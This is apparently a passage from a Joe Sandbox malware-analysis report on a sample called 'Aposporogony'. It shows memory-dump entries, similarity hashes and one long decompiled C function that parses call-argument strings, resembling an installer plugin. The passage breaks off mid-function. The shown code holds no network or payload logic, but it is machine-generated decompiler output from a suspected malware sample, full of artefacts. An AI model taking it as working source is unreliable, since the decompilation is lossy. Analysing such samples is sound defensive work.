                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                      • String ID: (7B${
                                                                                                                                                                                      • API String ID: 590372296-525222780
                                                                                                                                                                                      • Opcode ID: 48a1761c81aae8a212c19b7cba2e9838e7ffb34b4c28ee57c063dfd06133b02f
                                                                                                                                                                                      • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                                                                                                      • Opcode Fuzzy Hash: 48a1761c81aae8a212c19b7cba2e9838e7ffb34b4c28ee57c063dfd06133b02f
                                                                                                                                                                                      • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                      			E73D21B63() {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				WCHAR* _v24;
                                                                                                                                                                                      				WCHAR* _v28;
                                                                                                                                                                                      				signed int _v32;
                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                      				signed int _v40;
                                                                                                                                                                                      				WCHAR* _v44;
                                                                                                                                                                                      				signed int _v48;
                                                                                                                                                                                      				void* _v52;
                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                      				WCHAR* _t200;
                                                                                                                                                                                      				signed int _t203;
                                                                                                                                                                                      				void* _t205;
                                                                                                                                                                                      				void* _t207;
                                                                                                                                                                                      				WCHAR* _t209;
                                                                                                                                                                                      				void* _t217;
                                                                                                                                                                                      				struct HINSTANCE__* _t218;
                                                                                                                                                                                      				struct HINSTANCE__* _t219;
                                                                                                                                                                                      				struct HINSTANCE__* _t221;
                                                                                                                                                                                      				signed short _t223;
                                                                                                                                                                                      				struct HINSTANCE__* _t226;
                                                                                                                                                                                      				struct HINSTANCE__* _t228;
                                                                                                                                                                                      				void* _t229;
                                                                                                                                                                                      				intOrPtr* _t230;
                                                                                                                                                                                      				void* _t241;
                                                                                                                                                                                      				signed char _t242;
                                                                                                                                                                                      				signed int _t243;
                                                                                                                                                                                      				void* _t247;
                                                                                                                                                                                      				struct HINSTANCE__* _t249;
                                                                                                                                                                                      				void* _t250;
                                                                                                                                                                                      				signed int _t252;
                                                                                                                                                                                      				short* _t254;
                                                                                                                                                                                      				signed int _t260;
                                                                                                                                                                                      				signed int _t263;
                                                                                                                                                                                      				signed int _t265;
                                                                                                                                                                                      				void* _t268;
                                                                                                                                                                                      				void* _t272;
                                                                                                                                                                                      				struct HINSTANCE__* _t274;
                                                                                                                                                                                      				signed int _t277;
                                                                                                                                                                                      				void _t278;
                                                                                                                                                                                      				signed int _t279;
                                                                                                                                                                                      				signed int _t291;
                                                                                                                                                                                      				signed int _t292;
                                                                                                                                                                                      				void* _t294;
                                                                                                                                                                                      				signed int _t298;
                                                                                                                                                                                      				signed int _t301;
                                                                                                                                                                                      				signed int _t304;
                                                                                                                                                                                      				signed int _t305;
                                                                                                                                                                                      				signed int _t306;
                                                                                                                                                                                      				signed short _t309;
                                                                                                                                                                                      				signed int _t310;
                                                                                                                                                                                      				WCHAR* _t311;
                                                                                                                                                                                      				WCHAR* _t313;
                                                                                                                                                                                      				WCHAR* _t314;
                                                                                                                                                                                      				struct HINSTANCE__* _t315;
                                                                                                                                                                                      				void* _t317;
                                                                                                                                                                                      				signed int _t319;
                                                                                                                                                                                      				void* _t320;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t274 = 0;
                                                                                                                                                                                      				_v32 = 0;
                                                                                                                                                                                      				_v36 = 0;
                                                                                                                                                                                      				_v16 = 0;
                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                      				_v40 = 0;
                                                                                                                                                                                      				_t320 = 0;
                                                                                                                                                                                      				_v48 = 0;
                                                                                                                                                                                      				_t200 = E73D2121B();
                                                                                                                                                                                      				_v24 = _t200;
                                                                                                                                                                                      				_v28 = _t200;
                                                                                                                                                                                      				_v44 = E73D2121B();
                                                                                                                                                                                      				_t310 = E73D21243();
                                                                                                                                                                                      				_v52 = _t310;
                                                                                                                                                                                      				_v12 = _t310;
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					_t203 = _v32;
                                                                                                                                                                                      					_v56 = _t203;
                                                                                                                                                                                      					if(_t203 != _t274 && _t320 == _t274) {
                                                                                                                                                                                      						break;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t309 =  *_t310;
                                                                                                                                                                                      					_t277 = _t309 & 0x0000ffff;
                                                                                                                                                                                      					_t205 = _t277 - _t274;
                                                                                                                                                                                      					if(_t205 == 0) {
                                                                                                                                                                                      						_t33 =  &_v32;
                                                                                                                                                                                      						 *_t33 = _v32 | 0xffffffff;
                                                                                                                                                                                      						__eflags =  *_t33;
                                                                                                                                                                                      						L17:
                                                                                                                                                                                      						_t207 = _v56 - _t274;
                                                                                                                                                                                      						if(_t207 == 0) {
                                                                                                                                                                                      							__eflags = _t320 - _t274;
                                                                                                                                                                                      							 *_v28 = _t274;
                                                                                                                                                                                      							if(_t320 == _t274) {
                                                                                                                                                                                      								_t247 = GlobalAlloc(0x40, 0x1ca4); // executed
                                                                                                                                                                                      								_t320 = _t247;
                                                                                                                                                                                      								 *(_t320 + 0x1010) = _t274;
                                                                                                                                                                                      								 *(_t320 + 0x1014) = _t274;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t278 = _v36;
                                                                                                                                                                                      							_t43 = _t320 + 8; // 0x8
                                                                                                                                                                                      							_t209 = _t43;
                                                                                                                                                                                      							_t44 = _t320 + 0x808; // 0x808
                                                                                                                                                                                      							_t311 = _t44;
                                                                                                                                                                                      							 *_t320 = _t278;
                                                                                                                                                                                      							_t279 = _t278 - _t274;
                                                                                                                                                                                      							__eflags = _t279;
                                                                                                                                                                                      							 *_t209 = _t274;
                                                                                                                                                                                      							 *_t311 = _t274;
                                                                                                                                                                                      							 *(_t320 + 0x1008) = _t274;
                                                                                                                                                                                      							 *(_t320 + 0x100c) = _t274;
                                                                                                                                                                                      							 *(_t320 + 4) = _t274;
                                                                                                                                                                                      							if(_t279 == 0) {
                                                                                                                                                                                      								__eflags = _v28 - _v24;
                                                                                                                                                                                      								if(_v28 == _v24) {
                                                                                                                                                                                      									goto L39;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t317 = 0;
                                                                                                                                                                                      								GlobalFree(_t320);
                                                                                                                                                                                      								_t320 = E73D21311(_v24);
                                                                                                                                                                                      								__eflags = _t320 - _t274;
                                                                                                                                                                                      								if(_t320 == _t274) {
                                                                                                                                                                                      									goto L39;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									goto L32;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                      									L32:
                                                                                                                                                                                      									_t241 =  *(_t320 + 0x1ca0);
                                                                                                                                                                                      									__eflags = _t241 - _t274;
                                                                                                                                                                                      									if(_t241 == _t274) {
                                                                                                                                                                                      										break;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t317 = _t320;
                                                                                                                                                                                      									_t320 = _t241;
                                                                                                                                                                                      									__eflags = _t320 - _t274;
                                                                                                                                                                                      									if(_t320 != _t274) {
                                                                                                                                                                                      										continue;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									break;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags = _t317 - _t274;
                                                                                                                                                                                      								if(_t317 != _t274) {
                                                                                                                                                                                      									 *(_t317 + 0x1ca0) = _t274;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t242 =  *(_t320 + 0x1010);
                                                                                                                                                                                      								__eflags = _t242 & 0x00000008;
                                                                                                                                                                                      								if((_t242 & 0x00000008) == 0) {
                                                                                                                                                                                      									_t243 = _t242 | 0x00000002;
                                                                                                                                                                                      									__eflags = _t243;
                                                                                                                                                                                      									 *(_t320 + 0x1010) = _t243;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_t320 = E73D2158F(_t320);
                                                                                                                                                                                      									 *(_t320 + 0x1010) =  *(_t320 + 0x1010) & 0xfffffff5;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L39;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t291 = _t279 - 1;
                                                                                                                                                                                      								__eflags = _t291;
                                                                                                                                                                                      								if(_t291 == 0) {
                                                                                                                                                                                      									L28:
                                                                                                                                                                                      									lstrcpyW(_t209, _v44);
                                                                                                                                                                                      									L29:
                                                                                                                                                                                      									lstrcpyW(_t311, _v24);
                                                                                                                                                                                      									L39:
                                                                                                                                                                                      									_v12 = _v12 + 2;
                                                                                                                                                                                      									_v28 = _v24;
                                                                                                                                                                                      									L56:
                                                                                                                                                                                      									if(_v32 != 0xffffffff) {
                                                                                                                                                                                      										_t310 = _v12;
                                                                                                                                                                                      										continue;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									break;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t292 = _t291 - 1;
                                                                                                                                                                                      								__eflags = _t292;
                                                                                                                                                                                      								if(_t292 == 0) {
                                                                                                                                                                                      									goto L29;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags = _t292 != 1;
                                                                                                                                                                                      								if(_t292 != 1) {
                                                                                                                                                                                      									goto L39;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L28;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if(_t207 != 1) {
                                                                                                                                                                                      							goto L39;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t249 = _v16;
                                                                                                                                                                                      						if(_v40 == _t274) {
                                                                                                                                                                                      							_t249 = _t249 - 1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						 *(_t320 + 0x1014) = _t249;
                                                                                                                                                                                      						goto L39;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t250 = _t205 - 0x23;
                                                                                                                                                                                      					if(_t250 == 0) {
                                                                                                                                                                                      						__eflags = _t310 - _v52;
                                                                                                                                                                                      						if(_t310 <= _v52) {
                                                                                                                                                                                      							L15:
                                                                                                                                                                                      							_v32 = _t274;
                                                                                                                                                                                      							_v36 = _t274;
                                                                                                                                                                                      							goto L17;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags =  *((short*)(_t310 - 2)) - 0x3a;
                                                                                                                                                                                      						if( *((short*)(_t310 - 2)) != 0x3a) {
                                                                                                                                                                                      							goto L15;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _v32 - _t274;
                                                                                                                                                                                      						if(_v32 == _t274) {
                                                                                                                                                                                      							L40:
                                                                                                                                                                                      							_t252 = _v32 - _t274;
                                                                                                                                                                                      							__eflags = _t252;
                                                                                                                                                                                      							if(_t252 == 0) {
                                                                                                                                                                                      								__eflags = _t277 - 0x2a;
                                                                                                                                                                                      								if(_t277 == 0x2a) {
                                                                                                                                                                                      									_v36 = 2;
                                                                                                                                                                                      									L54:
                                                                                                                                                                                      									_t310 = _v12;
                                                                                                                                                                                      									_v28 = _v24;
                                                                                                                                                                                      									_t274 = 0;
                                                                                                                                                                                      									__eflags = 0;
                                                                                                                                                                                      									L55:
                                                                                                                                                                                      									_t319 = _t310 + 2;
                                                                                                                                                                                      									__eflags = _t319;
                                                                                                                                                                                      									_v12 = _t319;
                                                                                                                                                                                      									goto L56;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags = _t277 - 0x2d;
                                                                                                                                                                                      								if(_t277 == 0x2d) {
                                                                                                                                                                                      									L144:
                                                                                                                                                                                      									__eflags = _t309 - 0x2d;
                                                                                                                                                                                      									if(_t309 != 0x2d) {
                                                                                                                                                                                      										L147:
                                                                                                                                                                                      										_t254 = _t310 + 2;
                                                                                                                                                                                      										__eflags =  *_t254 - 0x3a;
                                                                                                                                                                                      										if( *_t254 != 0x3a) {
                                                                                                                                                                                      											L154:
                                                                                                                                                                                      											_v28 =  &(_v28[0]);
                                                                                                                                                                                      											 *_v28 = _t309;
                                                                                                                                                                                      											goto L55;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										__eflags = _t309 - 0x2d;
                                                                                                                                                                                      										if(_t309 == 0x2d) {
                                                                                                                                                                                      											goto L154;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_v36 = 1;
                                                                                                                                                                                      										L150:
                                                                                                                                                                                      										_v12 = _t254;
                                                                                                                                                                                      										__eflags = _v28 - _v24;
                                                                                                                                                                                      										if(_v28 <= _v24) {
                                                                                                                                                                                      											 *_v44 = _t274;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											 *_v28 = _t274;
                                                                                                                                                                                      											lstrcpyW(_v44, _v24);
                                                                                                                                                                                      										}
                                                                                                                                                                                      										goto L54;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t254 = _t310 + 2;
                                                                                                                                                                                      									__eflags =  *_t254 - 0x3e;
                                                                                                                                                                                      									if( *_t254 != 0x3e) {
                                                                                                                                                                                      										goto L147;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_v36 = 3;
                                                                                                                                                                                      									goto L150;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags = _t277 - 0x3a;
                                                                                                                                                                                      								if(_t277 != 0x3a) {
                                                                                                                                                                                      									goto L154;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L144;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t260 = _t252 - 1;
                                                                                                                                                                                      							__eflags = _t260;
                                                                                                                                                                                      							if(_t260 == 0) {
                                                                                                                                                                                      								L77:
                                                                                                                                                                                      								_t294 = _t277 + 0xffffffde;
                                                                                                                                                                                      								__eflags = _t294 - 0x55;
                                                                                                                                                                                      								if(_t294 > 0x55) {
                                                                                                                                                                                      									goto L54;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								switch( *((intOrPtr*)(( *(_t294 + 0x73d22300) & 0x000000ff) * 4 +  &M73D22274))) {
                                                                                                                                                                                      									case 0:
                                                                                                                                                                                      										__ecx = _v24;
                                                                                                                                                                                      										__edi = _v12;
                                                                                                                                                                                      										while(1) {
                                                                                                                                                                                      											__edi = __edi + 1;
                                                                                                                                                                                      											__edi = __edi + 1;
                                                                                                                                                                                      											_v12 = __edi;
                                                                                                                                                                                      											__ax =  *__edi;
                                                                                                                                                                                      											__eflags = __ax - __dx;
                                                                                                                                                                                      											if(__ax != __dx) {
                                                                                                                                                                                      												goto L129;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L128:
                                                                                                                                                                                      											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                                                                                                                                                      											if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                                                                                                                                                      												L133:
                                                                                                                                                                                      												 *__ecx =  *__ecx & 0x00000000;
                                                                                                                                                                                      												__eax = E73D2122C(_v24);
                                                                                                                                                                                      												__ebx = __eax;
                                                                                                                                                                                      												goto L94;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L129:
                                                                                                                                                                                      											__eflags = __ax;
                                                                                                                                                                                      											if(__ax == 0) {
                                                                                                                                                                                      												goto L133;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eflags = __ax - __dx;
                                                                                                                                                                                      											if(__ax == __dx) {
                                                                                                                                                                                      												__edi = __edi + 1;
                                                                                                                                                                                      												__edi = __edi + 1;
                                                                                                                                                                                      												__eflags = __edi;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__ax =  *__edi;
                                                                                                                                                                                      											 *__ecx =  *__edi;
                                                                                                                                                                                      											__ecx = __ecx + 1;
                                                                                                                                                                                      											__ecx = __ecx + 1;
                                                                                                                                                                                      											__edi = __edi + 1;
                                                                                                                                                                                      											__edi = __edi + 1;
                                                                                                                                                                                      											_v12 = __edi;
                                                                                                                                                                                      											__ax =  *__edi;
                                                                                                                                                                                      											__eflags = __ax - __dx;
                                                                                                                                                                                      											if(__ax != __dx) {
                                                                                                                                                                                      												goto L129;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											goto L128;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									case 1:
                                                                                                                                                                                      										_v8 = 1;
                                                                                                                                                                                      										goto L54;
                                                                                                                                                                                      									case 2:
                                                                                                                                                                                      										_v8 = _v8 | 0xffffffff;
                                                                                                                                                                                      										goto L54;
                                                                                                                                                                                      									case 3:
                                                                                                                                                                                      										_v8 = _v8 & 0x00000000;
                                                                                                                                                                                      										_v20 = _v20 & 0x00000000;
                                                                                                                                                                                      										_v16 = _v16 + 1;
                                                                                                                                                                                      										goto L82;
                                                                                                                                                                                      									case 4:
                                                                                                                                                                                      										__eflags = _v20;
                                                                                                                                                                                      										if(_v20 != 0) {
                                                                                                                                                                                      											goto L54;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_v12 = _v12 - 2;
                                                                                                                                                                                      										__ebx = E73D2121B();
                                                                                                                                                                                      										 &_v12 = E73D21AEA( &_v12);
                                                                                                                                                                                      										__eax = E73D21470(__edx, __eax, __edx, __ebx);
                                                                                                                                                                                      										goto L94;
                                                                                                                                                                                      									case 5:
                                                                                                                                                                                      										L102:
                                                                                                                                                                                      										_v20 = _v20 + 1;
                                                                                                                                                                                      										goto L54;
                                                                                                                                                                                      									case 6:
                                                                                                                                                                                      										_push(7);
                                                                                                                                                                                      										goto L120;
                                                                                                                                                                                      									case 7:
                                                                                                                                                                                      										_push(0x19);
                                                                                                                                                                                      										goto L140;
                                                                                                                                                                                      									case 8:
                                                                                                                                                                                      										__eax = 0;
                                                                                                                                                                                      										__eax = 1;
                                                                                                                                                                                      										__eflags = 1;
                                                                                                                                                                                      										goto L104;
                                                                                                                                                                                      									case 9:
                                                                                                                                                                                      										_push(0x15);
                                                                                                                                                                                      										goto L140;
                                                                                                                                                                                      									case 0xa:
                                                                                                                                                                                      										_push(0x16);
                                                                                                                                                                                      										goto L140;
                                                                                                                                                                                      									case 0xb:
                                                                                                                                                                                      										_push(0x18);
                                                                                                                                                                                      										goto L140;
                                                                                                                                                                                      									case 0xc:
                                                                                                                                                                                      										__eax = 0;
                                                                                                                                                                                      										__eax = 1;
                                                                                                                                                                                      										__eflags = 1;
                                                                                                                                                                                      										goto L115;
                                                                                                                                                                                      									case 0xd:
                                                                                                                                                                                      										__eax = 0;
                                                                                                                                                                                      										__eax = 1;
                                                                                                                                                                                      										__eflags = 1;
                                                                                                                                                                                      										goto L106;
                                                                                                                                                                                      									case 0xe:
                                                                                                                                                                                      										__eax = 0;
                                                                                                                                                                                      										__eax = 1;
                                                                                                                                                                                      										__eflags = 1;
                                                                                                                                                                                      										goto L108;
                                                                                                                                                                                      									case 0xf:
                                                                                                                                                                                      										__eax = 0;
                                                                                                                                                                                      										__eax = 1;
                                                                                                                                                                                      										__eflags = 1;
                                                                                                                                                                                      										goto L119;
                                                                                                                                                                                      									case 0x10:
                                                                                                                                                                                      										__eax = 0;
                                                                                                                                                                                      										__eax = 1;
                                                                                                                                                                                      										__eflags = 1;
                                                                                                                                                                                      										goto L110;
                                                                                                                                                                                      									case 0x11:
                                                                                                                                                                                      										_push(3);
                                                                                                                                                                                      										goto L120;
                                                                                                                                                                                      									case 0x12:
                                                                                                                                                                                      										_push(0x17);
                                                                                                                                                                                      										L140:
                                                                                                                                                                                      										_pop(__ebx);
                                                                                                                                                                                      										goto L95;
                                                                                                                                                                                      									case 0x13:
                                                                                                                                                                                      										__eax =  &_v12;
                                                                                                                                                                                      										__eax = E73D21AEA( &_v12);
                                                                                                                                                                                      										__ebx = __eax;
                                                                                                                                                                                      										__ebx = __eax + 1;
                                                                                                                                                                                      										__eflags = __ebx - 0xb;
                                                                                                                                                                                      										if(__ebx < 0xb) {
                                                                                                                                                                                      											__ebx = __ebx + 0xa;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										goto L94;
                                                                                                                                                                                      									case 0x14:
                                                                                                                                                                                      										__ebx = 0xffffffff;
                                                                                                                                                                                      										goto L95;
                                                                                                                                                                                      									case 0x15:
                                                                                                                                                                                      										__eax = 0;
                                                                                                                                                                                      										__eax = 1;
                                                                                                                                                                                      										__eflags = 1;
                                                                                                                                                                                      										goto L113;
                                                                                                                                                                                      									case 0x16:
                                                                                                                                                                                      										__ecx = 0;
                                                                                                                                                                                      										__eflags = 0;
                                                                                                                                                                                      										goto L88;
                                                                                                                                                                                      									case 0x17:
                                                                                                                                                                                      										__eax = 0;
                                                                                                                                                                                      										__eax = 1;
                                                                                                                                                                                      										__eflags = 1;
                                                                                                                                                                                      										goto L117;
                                                                                                                                                                                      									case 0x18:
                                                                                                                                                                                      										_t262 =  *(_t320 + 0x1014);
                                                                                                                                                                                      										__eflags = _t262 - _v16;
                                                                                                                                                                                      										if(_t262 > _v16) {
                                                                                                                                                                                      											_v16 = _t262;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_v8 = _v8 & 0x00000000;
                                                                                                                                                                                      										_v20 = _v20 & 0x00000000;
                                                                                                                                                                                      										_v36 - 3 = _t262 - (_v36 == 3);
                                                                                                                                                                                      										if(_t262 != _v36 == 3) {
                                                                                                                                                                                      											L82:
                                                                                                                                                                                      											_v40 = 1;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										goto L54;
                                                                                                                                                                                      									case 0x19:
                                                                                                                                                                                      										L104:
                                                                                                                                                                                      										__ecx = 0;
                                                                                                                                                                                      										_v8 = 2;
                                                                                                                                                                                      										__ecx = 1;
                                                                                                                                                                                      										goto L88;
                                                                                                                                                                                      									case 0x1a:
                                                                                                                                                                                      										L115:
                                                                                                                                                                                      										_push(5);
                                                                                                                                                                                      										goto L120;
                                                                                                                                                                                      									case 0x1b:
                                                                                                                                                                                      										L106:
                                                                                                                                                                                      										__ecx = 0;
                                                                                                                                                                                      										_v8 = 3;
                                                                                                                                                                                      										__ecx = 1;
                                                                                                                                                                                      										goto L88;
                                                                                                                                                                                      									case 0x1c:
                                                                                                                                                                                      										L108:
                                                                                                                                                                                      										__ecx = 0;
                                                                                                                                                                                      										__ecx = 1;
                                                                                                                                                                                      										goto L88;
                                                                                                                                                                                      									case 0x1d:
                                                                                                                                                                                      										L119:
                                                                                                                                                                                      										_push(6);
                                                                                                                                                                                      										goto L120;
                                                                                                                                                                                      									case 0x1e:
                                                                                                                                                                                      										L110:
                                                                                                                                                                                      										_push(2);
                                                                                                                                                                                      										goto L120;
                                                                                                                                                                                      									case 0x1f:
                                                                                                                                                                                      										__eax =  &_v12;
                                                                                                                                                                                      										__eax = E73D21AEA( &_v12);
                                                                                                                                                                                      										__ebx = __eax;
                                                                                                                                                                                      										__ebx = __eax + 1;
                                                                                                                                                                                      										goto L94;
                                                                                                                                                                                      									case 0x20:
                                                                                                                                                                                      										L113:
                                                                                                                                                                                      										_v48 = _v48 + 1;
                                                                                                                                                                                      										_push(4);
                                                                                                                                                                                      										_pop(__ecx);
                                                                                                                                                                                      										goto L88;
                                                                                                                                                                                      									case 0x21:
                                                                                                                                                                                      										L117:
                                                                                                                                                                                      										_push(4);
                                                                                                                                                                                      										L120:
                                                                                                                                                                                      										_pop(__ecx);
                                                                                                                                                                                      										L88:
                                                                                                                                                                                      										__edi = _v16;
                                                                                                                                                                                      										__edx =  *(0x73d2305c + __ecx * 4);
                                                                                                                                                                                      										__eax =  ~__eax;
                                                                                                                                                                                      										asm("sbb eax, eax");
                                                                                                                                                                                      										_v40 = 1;
                                                                                                                                                                                      										__edi = _v16 << 5;
                                                                                                                                                                                      										__eax = __eax & 0x00008000;
                                                                                                                                                                                      										__edi = (_v16 << 5) + __esi;
                                                                                                                                                                                      										__eax = __eax | __ecx;
                                                                                                                                                                                      										__eflags = _v8;
                                                                                                                                                                                      										 *(__edi + 0x1018) = __eax;
                                                                                                                                                                                      										if(_v8 < 0) {
                                                                                                                                                                                      											L90:
                                                                                                                                                                                      											__edx = 0;
                                                                                                                                                                                      											__edx = 1;
                                                                                                                                                                                      											__eflags = 1;
                                                                                                                                                                                      											L91:
                                                                                                                                                                                      											__eflags = _v8 - 1;
                                                                                                                                                                                      											 *(__edi + 0x1028) = __edx;
                                                                                                                                                                                      											if(_v8 == 1) {
                                                                                                                                                                                      												__eax =  &_v12;
                                                                                                                                                                                      												__eax = E73D21AEA( &_v12);
                                                                                                                                                                                      												__eax = __eax + 1;
                                                                                                                                                                                      												__eflags = __eax;
                                                                                                                                                                                      												_v8 = __eax;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eax = _v8;
                                                                                                                                                                                      											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                                                                                                                                                      											_t132 = _v16 + 0x81; // 0x81
                                                                                                                                                                                      											_t132 = _t132 << 5;
                                                                                                                                                                                      											__eax = 0;
                                                                                                                                                                                      											__eflags = 0;
                                                                                                                                                                                      											 *((intOrPtr*)((_t132 << 5) + __esi)) = 0;
                                                                                                                                                                                      											 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                                                                                                                                                      											 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                                                                                                                                                      											L94:
                                                                                                                                                                                      											__eflags = __ebx;
                                                                                                                                                                                      											if(__ebx == 0) {
                                                                                                                                                                                      												goto L54;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											L95:
                                                                                                                                                                                      											__eflags = _v20;
                                                                                                                                                                                      											_v40 = 1;
                                                                                                                                                                                      											if(_v20 != 0) {
                                                                                                                                                                                      												L100:
                                                                                                                                                                                      												__eflags = _v20 - 1;
                                                                                                                                                                                      												if(_v20 == 1) {
                                                                                                                                                                                      													__eax = _v16;
                                                                                                                                                                                      													__eax = _v16 << 5;
                                                                                                                                                                                      													__eflags = __eax;
                                                                                                                                                                                      													 *(__eax + __esi + 0x102c) = __ebx;
                                                                                                                                                                                      												}
                                                                                                                                                                                      												goto L102;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											_v16 = _v16 << 5;
                                                                                                                                                                                      											_t140 = __esi + 0x1030; // 0x1030
                                                                                                                                                                                      											__edi = (_v16 << 5) + _t140;
                                                                                                                                                                                      											__eax =  *__edi;
                                                                                                                                                                                      											__eflags = __eax - 0xffffffff;
                                                                                                                                                                                      											if(__eax <= 0xffffffff) {
                                                                                                                                                                                      												L98:
                                                                                                                                                                                      												__eax = GlobalFree(__eax);
                                                                                                                                                                                      												L99:
                                                                                                                                                                                      												 *__edi = __ebx;
                                                                                                                                                                                      												goto L100;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											__eflags = __eax - 0x19;
                                                                                                                                                                                      											if(__eax <= 0x19) {
                                                                                                                                                                                      												goto L99;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											goto L98;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										__eflags = __edx;
                                                                                                                                                                                      										if(__edx > 0) {
                                                                                                                                                                                      											goto L91;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										goto L90;
                                                                                                                                                                                      									case 0x22:
                                                                                                                                                                                      										goto L54;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t263 = _t260 - 1;
                                                                                                                                                                                      							__eflags = _t263;
                                                                                                                                                                                      							if(_t263 == 0) {
                                                                                                                                                                                      								_v16 = _t274;
                                                                                                                                                                                      								goto L77;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t263 != 1;
                                                                                                                                                                                      							if(_t263 != 1) {
                                                                                                                                                                                      								goto L154;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags = _t277 - 0x6e;
                                                                                                                                                                                      							if(__eflags > 0) {
                                                                                                                                                                                      								_t298 = _t277 - 0x72;
                                                                                                                                                                                      								__eflags = _t298;
                                                                                                                                                                                      								if(_t298 == 0) {
                                                                                                                                                                                      									_push(4);
                                                                                                                                                                                      									L71:
                                                                                                                                                                                      									_pop(_t265);
                                                                                                                                                                                      									L72:
                                                                                                                                                                                      									__eflags = _v8 - 1;
                                                                                                                                                                                      									if(_v8 != 1) {
                                                                                                                                                                                      										_t92 = _t320 + 0x1010;
                                                                                                                                                                                      										 *_t92 =  *(_t320 + 0x1010) &  !_t265;
                                                                                                                                                                                      										__eflags =  *_t92;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										 *(_t320 + 0x1010) =  *(_t320 + 0x1010) | _t265;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_v8 = 1;
                                                                                                                                                                                      									goto L54;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t301 = _t298 - 1;
                                                                                                                                                                                      								__eflags = _t301;
                                                                                                                                                                                      								if(_t301 == 0) {
                                                                                                                                                                                      									_push(0x10);
                                                                                                                                                                                      									goto L71;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags = _t301 != 0;
                                                                                                                                                                                      								if(_t301 != 0) {
